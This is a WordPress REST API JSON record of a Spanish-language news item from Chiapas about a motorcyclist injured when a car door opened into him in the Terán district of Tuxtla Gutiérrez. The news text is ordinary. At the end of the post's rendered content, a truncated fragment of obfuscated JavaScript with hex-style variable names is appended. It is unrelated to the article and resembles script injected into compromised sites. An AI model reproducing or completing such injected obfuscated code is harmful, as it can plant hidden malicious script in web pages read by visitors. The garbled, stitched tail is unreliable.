{"id":5495,"date":"2022-09-29T01:51:22","date_gmt":"2022-09-29T01:51:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5495"},"modified":"2022-09-29T01:51:22","modified_gmt":"2022-09-29T01:51:22","slug":"motociclista-resulta-herido-en-accidente-de-transito-3","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5495","title":{"rendered":"Motociclista resulta herido en accidente de tr\u00e1nsito"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0024-1024x768.jpg\" alt=\"\" class=\"wp-image-5496\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0024-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0024-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0024-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0024.jpg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>Ju<\/figcaption><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 28 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la tarde un motociclista resulta herido luego se sufrir una ca\u00edda repentina cuando circulaba en calles de la delegaci\u00f3n Ter\u00e1n.<\/p>\n\n\n\n<p>Este hecho ocurri\u00f3 cuando un motociclista circulaba en la 7a Sur, entre 9a y 10a Sur en Ampliaci\u00f3n Ter\u00e1n y de manera repentina el conductor de un veh\u00edculo abri\u00f3 la puerta y se estrell\u00f3.<\/p>\n\n\n\n<p>Por el golpe cay\u00f3 contra el pavimento y result\u00f3 herido en la rodilla.<\/p>\n\n\n\n<p>Param\u00e9dicos de Protecci\u00f3n Civil municipal arribaron al lugar para trasladar al lesionado a un nosocomio.<\/p>\n\n\n\n<p>Hasta el momento se desconocen sus generales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Ju Jairo Camacho. Agencia ReporteCiudadano, 28 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la tarde un motociclista resulta herido luego se sufrir una ca\u00edda repentina cuando circulaba en calles de la delegaci\u00f3n Ter\u00e1n. Este hecho ocurri\u00f3 cuando un motociclista circulaba en la 7a Sur, entre 9a y 10a Sur en Ampliaci\u00f3n Ter\u00e1n y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5496,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5495","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5495","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5495"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5495\/revisions"}],"predecessor-version":[{"id":5497,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5495\/revisions\/5497"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5496"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5495"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5495"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5495"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}